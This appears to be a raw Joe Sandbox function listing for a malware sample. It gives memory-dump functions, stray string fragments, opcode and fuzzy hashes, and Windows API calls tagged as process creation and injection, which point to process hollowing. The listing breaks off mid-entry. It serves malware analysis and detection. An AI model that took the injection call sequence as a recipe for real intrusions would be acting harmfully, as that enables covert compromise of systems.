Function 03699171 Relevance: 24.2, Strings: 19, Instructions: 423
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

%, xrefs: 03699398
], xrefs: 036994E0
a, xrefs: 036996DF
), xrefs: 0369960E
=, xrefs: 03699315
', xrefs: 0369979D
87TA, xrefs: 036996FF
_, xrefs: 036996A0
|,tB, xrefs: 03699375
C, xrefs: 03699416
I, xrefs: 03699675
P, xrefs: 03699386
Z, xrefs: 036997B3
;, xrefs: 036993D1
E, xrefs: 0369959A
b, xrefs: 03699405
, xrefs: 03699471
a, xrefs: 03699527
V, xrefs: 0369937F

Memory Dump Source

Source File: 0000000B.00000002.2181130964.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID:
String ID: $%$'$)$87TA$;$=$C$E$I$P$V$Z$]$_$a$a$b$|,tB
API String ID: 0-1020955577
Opcode ID: c977a2b95524d656ddfe288019af4332c5cee1ee1881a3fc0c1540a844399edd
Instruction ID: 3ef4d662e22f27af79bad1c8acdc2f064f921f9aae61c546671ed46c70881951
Opcode Fuzzy Hash: c977a2b95524d656ddfe288019af4332c5cee1ee1881a3fc0c1540a844399edd
Instruction Fuzzy Hash: 85328FB1D016298FEB64CF6AC9447D9BBF6BF88300F14C1EA941CAB255EB754E858F40

Function 03699AB7 Relevance: 24.1, Strings: 19, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_, xrefs: 0369A039
;, xrefs: 03699D70
a, xrefs: 0369A07B
, xrefs: 03699E13
P, xrefs: 03699D22
', xrefs: 0369A142
E, xrefs: 03699F3C
I, xrefs: 0369A00E
%, xrefs: 03699D31
Z, xrefs: 0369A158
87TA, xrefs: 0369A0A1
), xrefs: 03699FAD
V, xrefs: 03699D18
=, xrefs: 03699CB4
b, xrefs: 03699DAA
], xrefs: 03699E85
|,tB, xrefs: 03699D0E
C, xrefs: 03699DBB
a, xrefs: 03699ECC

Memory Dump Source

Source File: 0000000B.00000002.2181130964.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID:
String ID: $%$'$)$87TA$;$=$C$E$I$P$V$Z$]$_$a$a$b$|,tB
API String ID: 0-1020955577
Opcode ID: 1b57ccea519c5e731324129ebfe3d7964a47a852abe75c6d74ecd4d5fa690f36
Instruction ID: f8fd008b0767d147ea712e996a751296f17a4c2372923ef12eb04785cfbb3d00
Opcode Fuzzy Hash: 1b57ccea519c5e731324129ebfe3d7964a47a852abe75c6d74ecd4d5fa690f36
Instruction Fuzzy Hash: AC226FB1D016298FEB64CF6AC9447D9BBF6FF88304F14C1EA941CAB254EB754A858F40

Function 03699AC8 Relevance: 24.1, Strings: 19, Instructions: 357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_, xrefs: 0369A039
;, xrefs: 03699D70
a, xrefs: 0369A07B
, xrefs: 03699E13
P, xrefs: 03699D22
', xrefs: 0369A142
E, xrefs: 03699F3C
I, xrefs: 0369A00E
%, xrefs: 03699D31
Z, xrefs: 0369A158
87TA, xrefs: 0369A0A1
), xrefs: 03699FAD
V, xrefs: 03699D18
=, xrefs: 03699CB4
b, xrefs: 03699DAA
], xrefs: 03699E85
|,tB, xrefs: 03699D0E
C, xrefs: 03699DBB
a, xrefs: 03699ECC

Memory Dump Source

Source File: 0000000B.00000002.2181130964.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID:
String ID: $%$'$)$87TA$;$=$C$E$I$P$V$Z$]$_$a$a$b$|,tB
API String ID: 0-1020955577
Opcode ID: 238d55105425a7190b91dd7c989c741356f5360dc5b0341cec4fea149d7c2865
Instruction ID: 8e35ecc86ac72f47bf37a05d0e7297ee391dab77670ed87b1246f0fd74c0f69b
Opcode Fuzzy Hash: 238d55105425a7190b91dd7c989c741356f5360dc5b0341cec4fea149d7c2865
Instruction Fuzzy Hash: 0D1251B1D016298FEB64CF5AC9447D9BBF6BF88304F14C1EAD41CAB254EB754A858F40

Function 0369B050 Relevance: 7.0, Strings: 5, Instructions: 722COMMON

Download Yara Rule

Strings

,bq, xrefs: 0369B667
(o^q, xrefs: 0369B8E3
Hbq, xrefs: 0369B950
,bq, xrefs: 0369B677
(o^q, xrefs: 0369B8D9

Memory Dump Source

Source File: 0000000B.00000002.2181130964.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq$Hbq
API String ID: 0-3486158592
Opcode ID: 04489df9fc02bf39958bd949ba7817c0eaeae306eecbe4757cdb53a2d51c3276
Instruction ID: 06d13d9e411adfeeff6a0456bf8ef7aa172e07d27c7510b4b5fe95d9021b1570
Opcode Fuzzy Hash: 04489df9fc02bf39958bd949ba7817c0eaeae306eecbe4757cdb53a2d51c3276
Instruction Fuzzy Hash: 4F527134A001159FDF14DF69D998A6DB7BAFF89710F19816AE806DB364DB30EC41CB90

Function 05E95968 Relevance: 4.2, Strings: 3, Instructions: 441
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tw, xrefs: 05E95BC6
, xrefs: 05E95A9D
Tw, xrefs: 05E95B48

Memory Dump Source

Source File: 0000000B.00000002.2378369629.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5e90000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID:
String ID: $Tw$Tw
API String ID: 0-1451731703
Opcode ID: f8475d187083dc6cd050ff52c76da7e873a4d158f54eebfec707158198277e39
Instruction ID: ffa4b61bc93714ef6769fcdf68b79021f58f1b632b9307ef91a46884c7fcbc26
Opcode Fuzzy Hash: f8475d187083dc6cd050ff52c76da7e873a4d158f54eebfec707158198277e39
Instruction Fuzzy Hash: 7022BB70E04218CFDF18CFA9C984AEDBBF2BF88314F1491AAE909A7255D7349985CF50

Function 05E9AA03 Relevance: 2.9, Strings: 2, Instructions: 375
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2, xrefs: 05E9ACD9
R, xrefs: 05E9C148

Memory Dump Source

Source File: 0000000B.00000002.2378369629.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5e90000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID:
String ID: 2$R
API String ID: 0-2887989650
Opcode ID: ceaad67a517a9e04608d55e85312659b1f3d82091ad0763b6780326fb94abccd
Instruction ID: fd1897b9c970799242a3fe36566f163fe9f9bee7c20717278890c9df6e9935f3
Opcode Fuzzy Hash: ceaad67a517a9e04608d55e85312659b1f3d82091ad0763b6780326fb94abccd
Instruction Fuzzy Hash: F812B174E052298FDB64DF28C994AAEBBB2BF48301F1091E9D44DA7350DB35AE81CF51

Function 05E98BA8 Relevance: .4, Instructions: 428COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2378369629.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5e90000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d4f9ed2fc8dc18178320f86b3bac0f400d0eee292f4e355ec9e277e76a9fc1e
Instruction ID: 6a4c999019147c9bde6ea4ce2b0c62740989db67d7b1cc1a42e827b5b681cf3a
Opcode Fuzzy Hash: 4d4f9ed2fc8dc18178320f86b3bac0f400d0eee292f4e355ec9e277e76a9fc1e
Instruction Fuzzy Hash: 9322C074E04229CFDF28CF65C984BDDBBB2BF89300F1090A9E849A7255DB709A95CF51

Function 03695338 Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2181130964.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67192bc056c39dc6b4b831d41b811caae4d4128e65615124cd296329f3342855
Instruction ID: 0aaf95cdfa5400826b693452bff7a72f917827807b902cfebb3dd7ef0f092fdd
Opcode Fuzzy Hash: 67192bc056c39dc6b4b831d41b811caae4d4128e65615124cd296329f3342855
Instruction Fuzzy Hash: 52F1D274D00229CFEB65DF65D884BADBBB6BF89311F1080EAD54AA7354EB301A85CF11

Function 05E98B98 Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2378369629.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5e90000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fa192d1431601009be3c12a7f93128df4769160cf9ec6940c978626f39c9240
Instruction ID: f6c11e7522e51c0df978a91353ad0c43363848dceb2479ee61292a36c5f8685a
Opcode Fuzzy Hash: 3fa192d1431601009be3c12a7f93128df4769160cf9ec6940c978626f39c9240
Instruction Fuzzy Hash: C1E1F270E04219DFDF28CF65C884BDDBBB2BF89304F1090A9E859A7265DB709A85CF51

Function 05E979A8 Relevance: .3, Instructions: 293COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2378369629.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5e90000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4593ea0fdc80e490d10c1d2c2b23c123ff54beeb17b4dcbf9ec8b6a2013ebe53
Instruction ID: c8856fdeef7d7ca85ed318c03be8e3e6771f2f3b1e57f7ef64b4808f8c1b83da
Opcode Fuzzy Hash: 4593ea0fdc80e490d10c1d2c2b23c123ff54beeb17b4dcbf9ec8b6a2013ebe53
Instruction Fuzzy Hash: 46E1B074914268CFDF28CF65D884BEDBBB2FB8A305F1094EAD40AA7290D7705A85CF50

Function 03691BA8 Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2181130964.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 445c0a0acc728c0f448f946a175d9b8ba2da2206c10f4bc16ec2a617b977f439
Instruction ID: 048f11aed8ae229fdf386f69f37c08dd75a759c3a3300ba9bca4974a796b880a
Opcode Fuzzy Hash: 445c0a0acc728c0f448f946a175d9b8ba2da2206c10f4bc16ec2a617b977f439
Instruction Fuzzy Hash: 8391B074E00218DFDB18DFA9C994B9DBBF2BF89300F1081A9E509AB355EB316985CF40

Function 03691BB8 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2181130964.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43ef3942efc39d22977c4b0fce720db521a70b12ecb029929926e1c189159952
Instruction ID: b00d6f67ddb0911f4bf48c75e6665970273203c833ad83acd7f1619b10512f3f
Opcode Fuzzy Hash: 43ef3942efc39d22977c4b0fce720db521a70b12ecb029929926e1c189159952
Instruction Fuzzy Hash: 3F81AE74E00218DFDB58DFA9C994B9DBBF2BF89300F108169E509AB355EB31A985CF40

Function 03695C57 Relevance: 6.5, Strings: 5, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 03695FBA
Hbq, xrefs: 03695DF8
(o^q, xrefs: 03695FD0
,bq, xrefs: 03695E91
,bq, xrefs: 03695EA7

Memory Dump Source

Source File: 0000000B.00000002.2181130964.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq$Hbq
API String ID: 0-3486158592
Opcode ID: 7db05ce984e60e8e2aac7e2ceffa783f8144da7b55d734330c699b735fa89c41
Instruction ID: fc618307f85ba9f97404a144eda909a7f6bde8d367c3f7ddbf132f72fbbc10dc
Opcode Fuzzy Hash: 7db05ce984e60e8e2aac7e2ceffa783f8144da7b55d734330c699b735fa89c41
Instruction Fuzzy Hash: F2B19274A00229CFDF64DF24C994BA9B7B2BF49311F1081EAD90AA7351DB359E81CF50

Function 03696BB7 Relevance: 4.0, Strings: 3, Instructions: 221
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>, xrefs: 03696BF9
, xrefs: 03697018
M, xrefs: 03696BEF

Memory Dump Source

Source File: 0000000B.00000002.2181130964.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID:
String ID: $>$M
API String ID: 0-4291032161
Opcode ID: 36ad9587c49b83cd49f71ef7f632ec137b6679efc01cb5aa1a016eb16b801d9c
Instruction ID: 2b8205a005b643d29edded4641d2ed04dab99ced72e4b55ae16ad331bc15c522
Opcode Fuzzy Hash: 36ad9587c49b83cd49f71ef7f632ec137b6679efc01cb5aa1a016eb16b801d9c
Instruction Fuzzy Hash: 78C19D709112299BCF66EF24C99879DBBB6FF49300F1081EA990DA7260DB355F84CF40

Function 01D92436 Relevance: 3.8, Strings: 3, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 01D924EF
3, xrefs: 01D92491
;, xrefs: 01D92567

Memory Dump Source

Source File: 0000000B.00000002.2176504252.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d90000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID:
String ID: 3$;$M
API String ID: 0-3729316824
Opcode ID: c612729c37c03a406689cfc0026324313351b0f20eb8cf4b1a1ba107667e59b7
Instruction ID: a2aa0f278dcd21da53441446653a3f0189fe415cef71d3a490579ac2ce2749cf
Opcode Fuzzy Hash: c612729c37c03a406689cfc0026324313351b0f20eb8cf4b1a1ba107667e59b7
Instruction Fuzzy Hash: F94154B6D08A288BDBA18F68D9947D9BBF5FB18305F0040EAD50EA2300DB795A848F41

Function 03698567 Relevance: 3.0, Strings: 2, Instructions: 473
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

|,tB, xrefs: 0369862A
87TA, xrefs: 03698A89

Memory Dump Source

Source File: 0000000B.00000002.2181130964.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID:
String ID: 87TA$|,tB
API String ID: 0-403213639
Opcode ID: 65c5ac9b484237663fe5e9400562af16ebf53029a3f7d62caddc74a6bf3cbf2a
Instruction ID: c120c86d9bf2502870e49b9ba8e73e36e2173b7e1f8c3993ecd8925d2ed85e34
Opcode Fuzzy Hash: 65c5ac9b484237663fe5e9400562af16ebf53029a3f7d62caddc74a6bf3cbf2a
Instruction Fuzzy Hash: 824282B4A0024ACFDB01CF98D489BEEBBF1FB49315F1585A4D9086B366C775A885CF90

Function 01D9FA28 Relevance: 2.8, Strings: 2, Instructions: 253COMMON

Download Yara Rule

Strings

d8cq, xrefs: 01D9FA80
Hbq, xrefs: 01D9FC9E

Memory Dump Source

Source File: 0000000B.00000002.2176504252.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d90000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID:
String ID: Hbq$d8cq
API String ID: 0-70480990
Opcode ID: 827356c218c1de83f2049ce85687b256dc44ec302b2d3df92f240638bb69fd0b
Instruction ID: 315a20579577e8490a7b6ffb89a1ecca4797fd805baf4fc8691c5b01f0b1c46c
Opcode Fuzzy Hash: 827356c218c1de83f2049ce85687b256dc44ec302b2d3df92f240638bb69fd0b
Instruction Fuzzy Hash: 6991C2303047458FCB16AF39D864A6A7FE6EF89211F0484A9E546CB3A6DB78EC41CB51

Function 01D91BF7 Relevance: 2.6, Strings: 2, Instructions: 110COMMON

Download Yara Rule

Strings

[m5A, xrefs: 01D91E1D
6, xrefs: 01D91E28

Memory Dump Source

Source File: 0000000B.00000002.2176504252.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d90000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID:
String ID: 6$[m5A
API String ID: 0-2823401399
Opcode ID: 349480f69800c9f55759e4e070a0aae5260685fb133dbce5a84daf386d9aee1b
Instruction ID: 0b4bd36026865f28a2bbc15b020bd52b3e31c22e304495dce7be70c322472211
Opcode Fuzzy Hash: 349480f69800c9f55759e4e070a0aae5260685fb133dbce5a84daf386d9aee1b
Instruction Fuzzy Hash: B4516E75D41228DFEBA4DF64D894A99BBF1FB49200F5481EAD48EA2344DF319A80CF91

Function 05E96E89 Relevance: 2.6, Strings: 2, Instructions: 53COMMON

Download Yara Rule

Strings

M, xrefs: 05E96E89
, xrefs: 05E96F88

Memory Dump Source

Source File: 0000000B.00000002.2378369629.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5e90000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID:
String ID: $M
API String ID: 0-1049183097
Opcode ID: 76f53e6b7b268411d9336d6cd28b4e1c98dcd3522137d92be999043ad0217303
Instruction ID: 38ce45f0216c0e51bf599bbff0fc86947854857f65d26793c0a5cc2bc24022e5
Opcode Fuzzy Hash: 76f53e6b7b268411d9336d6cd28b4e1c98dcd3522137d92be999043ad0217303
Instruction Fuzzy Hash: 09315EB4D01229DFDBA5CF69C888B9DBBB1BB48300F1041EAE849A7350DB315E90CF90

Function 01D92F0A Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

3, xrefs: 01D92F0A
M, xrefs: 01D92F6B

Memory Dump Source

Source File: 0000000B.00000002.2176504252.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d90000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID:
String ID: 3$M
API String ID: 0-552164944
Opcode ID: a6c9b3270dae8526b9205514724d8a4280ec242dc1012d305c060a1486499ff6
Instruction ID: 3eaf65e9790847bdc032c5a2da6cf359aa3f258d5df6534fd0299a88c5dd9696
Opcode Fuzzy Hash: a6c9b3270dae8526b9205514724d8a4280ec242dc1012d305c060a1486499ff6
Instruction Fuzzy Hash: C6219CB5E05228CFDBA0CF65E998B9DBAF2BB48301F4040EAD54EA3340DB314E908F40

Function 01D9272C Relevance: 2.5, Strings: 2, Instructions: 36COMMON

Download Yara Rule

Strings

9, xrefs: 01D9273C
F, xrefs: 01D927D1

Memory Dump Source

Source File: 0000000B.00000002.2176504252.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d90000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID:
String ID: 9$F
API String ID: 0-3131834894
Opcode ID: bba97b10855a07018844c9c0559ddef5a8c2c497cb2d9f400c85a3f496f78794
Instruction ID: 6756c66eddf5dec5749b6825f9200caa2d948ed2e549ea6f2093275957d45e1e
Opcode Fuzzy Hash: bba97b10855a07018844c9c0559ddef5a8c2c497cb2d9f400c85a3f496f78794
Instruction Fuzzy Hash: DF116C74D49229CFDBA1CF64C894BA9B7B1FB48311F1050EAD409A2240DA3A6E90CF41

Function 05E11974 Relevance: 1.8, APIs: 1, Instructions: 327processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05E11C47

Memory Dump Source

Source File: 0000000B.00000002.2378233124.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5e10000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 43391d58513f0c13941c54033222e3e8eff8085e6dac108d2a8cab58ba9abc0b
Instruction ID: 047ab321073280255b0fa2e8423ee47100d99f247bd7efde5137634196832226
Opcode Fuzzy Hash: 43391d58513f0c13941c54033222e3e8eff8085e6dac108d2a8cab58ba9abc0b
Instruction Fuzzy Hash: 9DC126B1D0021D8FDB24CFA8C841BEDBBB1BF49304F0495A9D959B7240DB749A85CF99

Function 05E11980 Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05E11C47

Memory Dump Source

Source File: 0000000B.00000002.2378233124.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5e10000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3f2b8e1f8c0f29339c10caa73ade860d1b93e4cb1c32e884452706c105b34eef
Instruction ID: bee473e72d5f0792345c9900b0b6e545187c874d7d58f6b27d3907b765dd1e66
Opcode Fuzzy Hash: 3f2b8e1f8c0f29339c10caa73ade860d1b93e4cb1c32e884452706c105b34eef
Instruction Fuzzy Hash: EBC125B0D0021D8FDB24CFA8C841BEDBBB1BF49304F0095AAD959B7250DB749A85CF99

Function 05E11548 Relevance: 1.6, APIs: 1, Instructions: 120injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05E11623

Memory Dump Source

Source File: 0000000B.00000002.2378233124.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5e10000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 3859b3c51cc55f1131efad5ff1e2fcc2a438fe00c66037b2b48718d4638107d2
Instruction ID: 596d43497c0e2d683d5dbda169897b9592a356a37c61c906746d6bf7e458ef14
Opcode Fuzzy Hash: 3859b3c51cc55f1131efad5ff1e2fcc2a438fe00c66037b2b48718d4638107d2
Instruction Fuzzy Hash: A341CCB5D012589FCF10CFA9D980ADEFBF1BB49310F14902AE819B7240D735AA45CF68

Function 05E11550 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05E11623

Memory Dump Source

Source File: 0000000B.00000002.2378233124.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5e10000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 9d945baffa5585895904f887b152f2565d0d076045dbeb55aa51f568d0d11373
Instruction ID: d983185b953a21d86d0a496324ff38e4e7883128b83718792633aceb4e2d875b
Opcode Fuzzy Hash: 9d945baffa5585895904f887b152f2565d0d076045dbeb55aa51f568d0d11373
Instruction Fuzzy Hash: 8441AAB4D012589FCF04CFA9D984ADEFBF1BB49310F24902AE819B7250D735AA45CF68

Function 036DEAD8 Relevance: 1.6, APIs: 1, Instructions: 112libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 036DEBE1

Memory Dump Source

Source File: 0000000B.00000002.2181610239.00000000036D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36d0000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f4b5dbf669b671fad55ae7e34e860b4d7784631533ca5c74b6c58de2cce14800
Instruction ID: 3e8cb186aa96d744bcbf1ce072b2c244adc6d65824651900b5b9cb9705744ef6
Opcode Fuzzy Hash: f4b5dbf669b671fad55ae7e34e860b4d7784631533ca5c74b6c58de2cce14800
Instruction Fuzzy Hash: A2412FB4D012489FDB14CFA9CA85B9EFBF2FB49300F14912AE815AB384D775A845CF45

Function 05E113F0 Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05E114A2

Memory Dump Source

Source File: 0000000B.00000002.2378233124.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5e10000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f1fc868082710028eab31669d119d00a5bca8f8c3a7759cfcb29149c7aaa52d0
Instruction ID: 6c9c3293b29bdb445e90882459c7d403208a9f3112241f566f85c8e64bc21375
Opcode Fuzzy Hash: f1fc868082710028eab31669d119d00a5bca8f8c3a7759cfcb29149c7aaa52d0
Instruction Fuzzy Hash: 1741B8B8D002589FCF14CFA9D984ADEFBB1BB49310F14A02AE915B7340D735A901CF58

Function 05E113F8 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05E114A2

Memory Dump Source

Source File: 0000000B.00000002.2378233124.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5e10000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0abb9a532a1739533e7ce1e40df13820914ce6a5bd118f792cd5167245ac4f51
Instruction ID: 4e2a87fcb04bee0d90436690ab776b9fb786b6dd5b97f0bfe51aab2579291484
Opcode Fuzzy Hash: 0abb9a532a1739533e7ce1e40df13820914ce6a5bd118f792cd5167245ac4f51
Instruction Fuzzy Hash: 0E31A8B8D002589FCF14CFA9D984ADEFBB1BB49310F10A42AE815B7300D735A945CF58

Function 05E111EA Relevance: 1.6, APIs: 1, Instructions: 95threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 05E1129F

Memory Dump Source

Source File: 0000000B.00000002.2378233124.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5e10000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 95b1917ea42b88c36067d5af1986adb1fe6f8fd76395958584812d4dbe7d9c33
Instruction ID: b74a2678e8089a7d3b49ba1060a97c109e74828bc27da4c8209ddee915cb4932
Opcode Fuzzy Hash: 95b1917ea42b88c36067d5af1986adb1fe6f8fd76395958584812d4dbe7d9c33
Instruction Fuzzy Hash: 6B41BBB4D012589FCB14CFA9D885AEEFBF1BF49314F24902AE819B7240D738A945CF58

Function 05E111F0 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 05E1129F

Memory Dump Source

Source File: 0000000B.00000002.2378233124.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5e10000_NoCZBiPwAcSyoDte_ne2sJt7.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 31b787e977ed59a34d6ac0788d26dfbb9540955b05c1c338655abf24b70cfe4a
